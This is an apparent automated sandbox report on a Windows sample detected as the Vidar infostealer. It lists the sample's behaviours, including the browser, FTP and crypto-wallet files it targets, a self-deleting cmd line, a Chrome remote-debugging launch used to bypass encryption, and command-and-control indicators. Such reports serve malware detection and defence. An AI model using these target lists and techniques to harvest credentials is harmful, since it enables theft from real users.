Source: C:\Users\user\Desktop\Cm2GRjWK1C.exe	Code function: 0_2_02C1099D mov eax, dword ptr fs:[00000030h]	0_2_02C1099D
Source: C:\Users\user\Desktop\Cm2GRjWK1C.exe	Code function: 0_2_02C119DB mov eax, dword ptr fs:[00000030h]	0_2_02C119DB
Source: C:\Users\user\Desktop\Cm2GRjWK1C.exe	Code function: 0_2_02C10FED mov eax, dword ptr fs:[00000030h]	0_2_02C10FED
Source: C:\Users\user\Desktop\Cm2GRjWK1C.exe	Code function: 0_2_02C10FEC mov eax, dword ptr fs:[00000030h]	0_2_02C10FEC
Source: C:\Users\user\Desktop\Cm2GRjWK1C.exe	Code function: 0_2_02C10D4D mov eax, dword ptr fs:[00000030h]	0_2_02C10D4D

Source: C:\Users\user\Desktop\Cm2GRjWK1C.exe

0_3_02D42690

HIPS / PFW / Operating System Protection Evasion

Searches for specific processes (likely to inject)

Source: C:\Users\user\Desktop\Cm2GRjWK1C.exe

Code function: 0_3_02D51310 CreateToolhelp32Snapshot,Process32First,Process32Next,CloseHandle,Process32Next,StrCmpCA,OpenProcess,TerminateProcess,CloseHandle,

0_3_02D51310

Source: C:\Users\user\Desktop\Cm2GRjWK1C.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c timeout /t 11 & rd /s /q "C:\ProgramData\dba1d" & exit			Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 11			Jump to behavior

Source: Cm2GRjWK1C.exe

Binary or memory string: SeShutdownPrivilegeDo Restart ...Get privilege fail !?*.*//?&??%02x-%02x-%02x-%02x-%02x-%02x00-05-6900-0C-2900-50-5600-1c-1400-1C-4200-03-FF00-0F-4Bopen00-16-3E08-00-27ADVAPI32.dllCreateProcessWithTokenW -AdminrunasGetNativeSystemInfokernel32Shell_TrayWndProgramW6432\*.*...\\*Error:.It looks like the setup file has been corrupted, please download again...%02X%02X%02X%02X%02X%02X%02X%02X%02X%02X%02X%02X%02X%02X%02X%02Xhttp://www.dvdfab.cn/bad_package.htm?s=22DVDFab2622\DVDFab Player 527Passkey0Random : max(%d), index(%d).

Source: C:\Users\user\Desktop\Cm2GRjWK1C.exe

Code function: LocalAlloc,GetLocaleInfoA,GetLocaleInfoA,LocalFree,

0_3_02D4FC20

Source: C:\Users\user\Desktop\Cm2GRjWK1C.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0			Jump to behavior
Source: C:\Users\user\Desktop\Cm2GRjWK1C.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0			Jump to behavior

Source: C:\Users\user\Desktop\Cm2GRjWK1C.exe	Queries volume information: C:\ VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Cm2GRjWK1C.exe	Queries volume information: C:\ VolumeInformation			Jump to behavior

Source: C:\Users\user\Desktop\Cm2GRjWK1C.exe

Code function: 0_3_02D5BAA0 GetLocalTime,SystemTimeToFileTime,FileTimeToSystemTime,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,

0_3_02D5BAA0

Source: C:\Users\user\Desktop\Cm2GRjWK1C.exe

Code function: 0_3_02D56F80 memset,GetModuleFileNameA,ShellExecuteEx,memset,lstrlenW,GetWindowsDirectoryW,GetComputerNameW,GetFullPathNameA,GetUserNameW,GetFileType,GetModuleFileNameA,GetTempPathW,

0_3_02D56F80

Source: C:\Users\user\Desktop\Cm2GRjWK1C.exe

Code function: 0_3_02D4FBC0 GetProcessHeap,RtlAllocateHeap,GetTimeZoneInformation,wsprintfA,

0_3_02D4FBC0

Source: C:\Users\user\Desktop\Cm2GRjWK1C.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information

Yara detected Vidar stealer

Source: Yara match	File source: sslproxydump.pcap, type: PCAP
Source: Yara match	File source: 00000000.00000003.1286006933.00000000010B6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.1300135134.00000000010B4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.1300089487.00000000010B0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.1285961370.00000000010B6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.1314253795.00000000010B0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: Cm2GRjWK1C.exe PID: 7628, type: MEMORYSTR

Found many strings related to Crypto-Wallets (likely being stolen)

Source: Cm2GRjWK1C.exe, 00000000.00000002.1678369352.00000000010A3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: wallet.,seed.,btc.,key.,2fa.,crypto.,coin.,private.,2fa.,auth.,ledger.,trezor.,pass.,wal.,upbit.,bcex.,bithimb.,hitbtc.,bitflyer.,kucoin.,huobi.,poloniex.,kraken.,okex.,binance.,bitfinex.,gdax.,ethereum.,exodus.,metamask.,myetherwallet.,electrum.,bitcoin.,blockchain.,coinomi.,words.,meta.,mask.,eth.,recovery.
Source: Cm2GRjWK1C.exe, 00000000.00000002.1678369352.00000000010F4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: \ElectronCash\wallets\
Source: Cm2GRjWK1C.exe, 00000000.00000002.1678369352.00000000010F4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: \Electrum\wallets\
Source: Cm2GRjWK1C.exe, 00000000.00000002.1678369352.00000000010F4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: window-state.json
Source: Cm2GRjWK1C.exe, 00000000.00000002.1678369352.00000000010F4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: exodus.conf.json
Source: Cm2GRjWK1C.exe, 00000000.00000002.1678369352.00000000010F4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: \Exodus\
Source: Cm2GRjWK1C.exe, 00000000.00000002.1678369352.00000000010F4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: info.seco
Source: Cm2GRjWK1C.exe, 00000000.00000002.1678369352.00000000010F4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: ElectrumLTC
Source: Cm2GRjWK1C.exe, 00000000.00000002.1678369352.00000000010F4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: passphrase.json
Source: Cm2GRjWK1C.exe, 00000000.00000002.1678369352.00000000010F4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: \Ethereum\
Source: Cm2GRjWK1C.exe, 00000000.00000002.1678369352.00000000010A3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Exodus Web3 Wallet
Source: Cm2GRjWK1C.exe, 00000000.00000002.1678369352.00000000010A3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: wallet.,seed.,btc.,key.,2fa.,crypto.,coin.,private.,2fa.,auth.,ledger.,trezor.,pass.,wal.,upbit.,bcex.,bithimb.,hitbtc.,bitflyer.,kucoin.,huobi.,poloniex.,kraken.,okex.,binance.,bitfinex.,gdax.,ethereum.,exodus.,metamask.,myetherwallet.,electrum.,bitcoin.,blockchain.,coinomi.,words.,meta.,mask.,eth.,recovery.
Source: Cm2GRjWK1C.exe, 00000000.00000002.1678369352.00000000010A3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: \Coinomi\Coinomi\wallets\
Source: Cm2GRjWK1C.exe, 00000000.00000002.1678369352.00000000010F4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: MultiDoge
Source: Cm2GRjWK1C.exe, 00000000.00000002.1678369352.00000000010F4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: \Exodus\exodus.wallet\
Source: Cm2GRjWK1C.exe, 00000000.00000002.1678369352.00000000010F4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: seed.seco
Source: Cm2GRjWK1C.exe, 00000000.00000002.1678369352.00000000010F4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: keystore
Source: Cm2GRjWK1C.exe, 00000000.00000002.1678369352.00000000010F4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: \Electrum-LTC\wallets\

Tries to harvest and steal Bitcoin Wallet information

Source: C:\Users\user\Desktop\Cm2GRjWK1C.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\monero-project\monero-core

Jump to behavior

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Source: C:\Users\user\Desktop\Cm2GRjWK1C.exe

Key opened: HKEY_CURRENT_USER\Software\Martin Prikryl\WinSCP 2\Configuration

Jump to behavior

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\Desktop\Cm2GRjWK1C.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History	Jump to behavior
Source: C:\Users\user\Desktop\Cm2GRjWK1C.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\chrome\idb\3561288849sdhlie.files\key4.db	Jump to behavior
Source: C:\Users\user\Desktop\Cm2GRjWK1C.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\datareporting\glean\tmp\key4.db	Jump to behavior
Source: C:\Users\user\Desktop\Cm2GRjWK1C.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\chrome\idb\2918063365piupsah.files\key4.db	Jump to behavior
Source: C:\Users\user\Desktop\Cm2GRjWK1C.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\key4.db	Jump to behavior
Source: C:\Users\user\Desktop\Cm2GRjWK1C.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\datareporting\glean\db\key4.db	Jump to behavior
Source: C:\Users\user\Desktop\Cm2GRjWK1C.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\datareporting\glean\events\key4.db	Jump to behavior
Source: C:\Users\user\Desktop\Cm2GRjWK1C.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\Cm2GRjWK1C.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History	Jump to behavior
Source: C:\Users\user\Desktop\Cm2GRjWK1C.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\Cm2GRjWK1C.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\minidumps\key4.db	Jump to behavior
Source: C:\Users\user\Desktop\Cm2GRjWK1C.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\saved-telemetry-pings\key4.db	Jump to behavior
Source: C:\Users\user\Desktop\Cm2GRjWK1C.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\chrome\idb\3870112724rsegmnoittet-es.files\key4.db	Jump to behavior
Source: C:\Users\user\Desktop\Cm2GRjWK1C.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.js	Jump to behavior
Source: C:\Users\user\Desktop\Cm2GRjWK1C.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\chrome\idb\2823318777ntouromlalnodry--naod.files\key4.db	Jump to behavior
Source: C:\Users\user\Desktop\Cm2GRjWK1C.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\datareporting\key4.db	Jump to behavior
Source: C:\Users\user\Desktop\Cm2GRjWK1C.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\datareporting\glean\pending_pings\key4.db	Jump to behavior
Source: C:\Users\user\Desktop\Cm2GRjWK1C.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\key4.db	Jump to behavior
Source: C:\Users\user\Desktop\Cm2GRjWK1C.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\chrome\key4.db	Jump to behavior
Source: C:\Users\user\Desktop\Cm2GRjWK1C.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\crashes\key4.db	Jump to behavior
Source: C:\Users\user\Desktop\Cm2GRjWK1C.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\Cm2GRjWK1C.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\key4.db	Jump to behavior
Source: C:\Users\user\Desktop\Cm2GRjWK1C.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\bookmarkbackups\key4.db	Jump to behavior
Source: C:\Users\user\Desktop\Cm2GRjWK1C.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\key4.db	Jump to behavior
Source: C:\Users\user\Desktop\Cm2GRjWK1C.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\chrome\idb\1657114595AmcateirvtiSty.files\key4.db	Jump to behavior
Source: C:\Users\user\Desktop\Cm2GRjWK1C.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\temporary\key4.db	Jump to behavior
Source: C:\Users\user\Desktop\Cm2GRjWK1C.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\security_state\key4.db	Jump to behavior
Source: C:\Users\user\Desktop\Cm2GRjWK1C.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\datareporting\archived\2023-10\key4.db	Jump to behavior
Source: C:\Users\user\Desktop\Cm2GRjWK1C.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\to-be-removed\key4.db	Jump to behavior
Source: C:\Users\user\Desktop\Cm2GRjWK1C.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\datareporting\glean\key4.db	Jump to behavior
Source: C:\Users\user\Desktop\Cm2GRjWK1C.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\chrome\idb\key4.db	Jump to behavior
Source: C:\Users\user\Desktop\Cm2GRjWK1C.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\chrome\idb\1451318868ntouromlalnodry--epcr.files\key4.db	Jump to behavior
Source: C:\Users\user\Desktop\Cm2GRjWK1C.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\z6bny8rn.default\key4.db	Jump to behavior
Source: C:\Users\user\Desktop\Cm2GRjWK1C.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\crashes\events\key4.db	Jump to behavior
Source: C:\Users\user\Desktop\Cm2GRjWK1C.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\datareporting\archived\key4.db	Jump to behavior
Source: C:\Users\user\Desktop\Cm2GRjWK1C.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\Cm2GRjWK1C.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\sessionstore-backups\key4.db	Jump to behavior
Source: C:\Users\user\Desktop\Cm2GRjWK1C.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior
Source: C:\Users\user\Desktop\Cm2GRjWK1C.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\default\key4.db	Jump to behavior

Tries to harvest and steal ftp login credentials

Source: C:\Users\user\Desktop\Cm2GRjWK1C.exe

File opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml

Jump to behavior

Tries to steal Crypto Currency Wallets

Source: C:\Users\user\Desktop\Cm2GRjWK1C.exe	File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets\	Jump to behavior
Source: C:\Users\user\Desktop\Cm2GRjWK1C.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\	Jump to behavior
Source: C:\Users\user\Desktop\Cm2GRjWK1C.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\	Jump to behavior
Source: C:\Users\user\Desktop\Cm2GRjWK1C.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\	Jump to behavior
Source: C:\Users\user\Desktop\Cm2GRjWK1C.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\	Jump to behavior
Source: C:\Users\user\Desktop\Cm2GRjWK1C.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\	Jump to behavior
Source: C:\Users\user\Desktop\Cm2GRjWK1C.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\	Jump to behavior
Source: C:\Users\user\Desktop\Cm2GRjWK1C.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\	Jump to behavior
Source: C:\Users\user\Desktop\Cm2GRjWK1C.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\backups\	Jump to behavior
Source: C:\Users\user\Desktop\Cm2GRjWK1C.exe	File opened: C:\Users\user\AppData\Roaming\ElectronCash\wallets\	Jump to behavior
Source: C:\Users\user\Desktop\Cm2GRjWK1C.exe	File opened: C:\Users\user\AppData\Roaming\MultiDoge\	Jump to behavior
Source: C:\Users\user\Desktop\Cm2GRjWK1C.exe	File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb\	Jump to behavior
Source: C:\Users\user\Desktop\Cm2GRjWK1C.exe	File opened: C:\Users\user\AppData\Roaming\Binance\	Jump to behavior
Source: C:\Users\user\Desktop\Cm2GRjWK1C.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\	Jump to behavior
Source: C:\Users\user\Desktop\Cm2GRjWK1C.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\	Jump to behavior
Source: C:\Users\user\Desktop\Cm2GRjWK1C.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live\Local Storage\leveldb\	Jump to behavior
Source: C:\Users\user\Desktop\Cm2GRjWK1C.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live\Session Storage\	Jump to behavior
Source: C:\Users\user\Desktop\Cm2GRjWK1C.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live\	Jump to behavior
Source: C:\Users\user\Desktop\Cm2GRjWK1C.exe	File opened: C:\Users\user\AppData\Roaming\atomic_qt\config\	Jump to behavior
Source: C:\Users\user\Desktop\Cm2GRjWK1C.exe	File opened: C:\Users\user\AppData\Roaming\atomic_qt\exports\	Jump to behavior
Source: C:\Users\user\Desktop\Cm2GRjWK1C.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\	Jump to behavior
Source: C:\Users\user\Desktop\Cm2GRjWK1C.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\Local Storage\leveldb\	Jump to behavior

Source: Yara match	File source: 00000000.00000002.1678369352.00000000010A3000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: Cm2GRjWK1C.exe PID: 7628, type: MEMORYSTR

Remote Access Functionality

Attempt to bypass Chrome Application-Bound Encryption

Source: C:\Users\user\Desktop\Cm2GRjWK1C.exe

Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"

Yara detected Vidar stealer

Source: Yara match	File source: sslproxydump.pcap, type: PCAP
Source: Yara match	File source: 00000000.00000003.1286006933.00000000010B6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.1300135134.00000000010B4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.1300089487.00000000010B0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.1285961370.00000000010B6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.1314253795.00000000010B0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: Cm2GRjWK1C.exe PID: 7628, type: MEMORYSTR

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	2 Command and Scripting Interpreter	1 Create Account	112 Process Injection	1 Masquerading	2 OS Credential Dumping	2 System Time Discovery	Remote Services	1 Screen Capture	21 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	Scheduled Task/Job	1 DLL Side-Loading	1 DLL Side-Loading	1 Virtualization/Sandbox Evasion	1 Credentials in Registry	11 Security Software Discovery	Remote Desktop Protocol	11 Archive Collected Data	1 Remote Access Software	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	1 Extra Window Memory Injection	112 Process Injection	Security Account Manager	1 Virtualization/Sandbox Evasion	SMB/Windows Admin Shares	4 Data from Local System	2 Ingress Tool Transfer	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	1 DLL Side-Loading	NTDS	13 Process Discovery	Distributed Component Object Model	Input Capture	3 Non-Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 Extra Window Memory Injection	LSA Secrets	1 Account Discovery	SSH	Keylogging	14 Application Layer Protocol	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	Steganography	Cached Domain Credentials	1 System Owner/User Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	Compile After Delivery	DCSync	4 File and Directory Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	Indicator Removal from Tools	Proc Filesystem	35 System Information Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
Cm2GRjWK1C.exe	1%	Virustotal		Browse
Cm2GRjWK1C.exe	3%	ReversingLabs

Source	Detection	Scanner	Label
https://95.217.30.53;	0%	Avira URL Cloud	safe
https://95.217.30.53MC	0%	Avira URL Cloud	safe
https://dl.dvdfab.cn/download/31_7051_c2b57a7c/playerfab_7051.exe	0%	Avira URL Cloud	safe
https://app-api-j1.dvdfab.cn/api/	0%	Avira URL Cloud	safe
https://app-api-d1.dvdfab.cn/api/	0%	Avira URL Cloud	safe
https://d17.dvdfab.cn/download/31_7051_c2b57a7c/playerfab_7051.exe	0%	Avira URL Cloud	safe
https://dl.dvdfab.cn/download/12_7051_c2751989/playerfab_x64_	0%	Avira URL Cloud	safe
https://dr.dvdfab.cn/download/31_7051_c2b57a7c/playerfab_7051.exe	0%	Avira URL Cloud	safe
https://95.217.30.53/zD	0%	Avira URL Cloud	safe
https://dr.dvdfab.cn/download/12_7051_c2751989/playerfab_x64_7051.exe	0%	Avira URL Cloud	safe
https://app-api-j1.dvdfab.cn/api/JPNhttps://app-api-c1.dvdfab.cn/api/ENUhttps://app-api-d1.dvdfab.cn	0%	Avira URL Cloud	safe
https://test-app-api.dvdfab.cn/api/	0%	Avira URL Cloud	safe
https://95.217.30.53/	0%	Avira URL Cloud	safe
https://dl.dvdfab.cn/download/12_7051_c2751989/playerfab_x64_7051.exe	0%	Avira URL Cloud	safe
https://d223.dvdfab.cn/download/12_7051_c2751989/playerfab_x64_7051.exe	0%	Avira URL Cloud	safe
https://d171.dvdf	0%	Avira URL Cloud	safe
https://app-api-j1.dvdfab.cn/api/common_json_post/https://app-api-d1.dvdfab.cn/api/common_json_post/	0%	Avira URL Cloud	safe
https://d207.dvdfab.cn/download/12_7051_c2751989/playerfab_x64_7051.exe	0%	Avira URL Cloud	safe
https://d18.dvdfab.cn/download/31_7051_c2b57a7c/playerfab_7051.exe	0%	Avira URL Cloud	safe
https://app-api-d1.dvdfab.cn/api/common_json_post/	0%	Avira URL Cloud	safe
https://95.217.30.53/)CMA	0%	Avira URL Cloud	safe
https://95.217.30.53hellohttps://t.me/l793oyir7amMozilla/5.0	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
plus.l.google.com	142.250.185.142	true	false	high
play.google.com	142.250.185.206	true	false	high
www.google.com	142.250.186.68	true	false	high
apis.google.com	unknown	unknown	false	high

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://95.217.30.53/	true	Avira URL Cloud: safe	unknown
https://steamcommunity.com/profiles/76561199829660832	false		high
https://www.google.com/complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=20&gs_rn=42&sugkey=AIzaSyA2KlwBX3mkFo30om9LUFYQhpqLoa_BNhE	false		high

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://mail.google.com/mail/?usp=installed_webapp	chrome.exe, 00000008.00000002.1474848712.00001ECC02B34000.00000004.00001000.00020000.00000000.sdmp	false		high
https://duckduckgo.com/ac/?q=	x4wbi5.0.dr	false		high
https://safebrowsing.google.com/safebrowsing/clientreport/chrome-sct-auditing	chrome.exe, 00000008.00000002.1472451164.00001ECC023DF000.00000004.00001000.00020000.00000000.sdmp	false		high
https://support.google.com/chrome/answer/6098869	chrome.exe, 00000008.00000002.1464391432.00000241BD430000.00000002.00000001.00040000.0000000F.sdmp	false		high
https://mail.google.com/chat/download?usp=chrome_defaultfault	chrome.exe, 00000008.00000002.1479307186.00001ECC03AD0000.00000004.00001000.00020000.00000000.sdmp	false		high
https://www.dvdfab.cn/player7.htm?soft=playerfab&ad=playerfab_client_update_old&platform=x64&v=	Cm2GRjWK1C.exe	false		high
https://clients3.google.com/cast/chromecast/home/wallpaper/image?rt=b	chrome.exe, 00000008.00000002.1474315925.00001ECC02A15000.00000004.00001000.00020000.00000000.sdmp	false		high
https://docs.google.com/document/J	chrome.exe, 00000008.00000002.1474848712.00001ECC02B34000.00000004.00001000.00020000.00000000.sdmp	false		high
https://myaccount.google.com/find-your-phone?utm_source=ga-chrome-actions&utm_medium=findYourPhone	chrome.exe, 00000008.00000002.1475287933.00001ECC02C90000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.1476576882.00001ECC0315C000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.1475840951.00001ECC02ED8000.00000004.00001000.00020000.00000000.sdmp	false		high
https://www.dvdfab.cn/thankyou.htm?s=streamfab&ad=streamfab_client_thankyou_r18&downloadmode=1&pid=r	Cm2GRjWK1C.exe	false		high
https://bridge.lga1.admarketplace.net/ctp?version=16.0.0&key=1696332238301000001.2&ci=1696332238417.	Cm2GRjWK1C.exe, 00000000.00000002.1678369352.00000000010F4000.00000004.00000020.00020000.00000000.sdmp, vaim7g.0.dr	false		high
https://blog.google/products/chrome/google-chrome-safe-browsing-real-time/	chrome.exe, 00000008.00000002.1474929281.00001ECC02B58000.00000004.00001000.00020000.00000000.sdmp	false		high
https://trkkn.com	chrome.exe, 00000008.00000002.1476142946.00001ECC0304A000.00000004.00001000.00020000.00000000.sdmp	false		high
https://support.google.com/chrome?p=desktop_tab_groups	chrome.exe, 00000008.00000002.1473665659.00001ECC027D8000.00000004.00001000.00020000.00000000.sdmp	false		high
http://dns-tunnel-check.googlezip.net/connect	chrome.exe, 00000008.00000003.1390000033.00001ECC032D0000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.1476891441.00001ECC032D0000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.1417772160.00001ECC032CC000.00000004.00001000.00020000.00000000.sdmp	false		high
https://95.217.30.53;	Cm2GRjWK1C.exe, 00000000.00000003.1314253795.00000000010B0000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
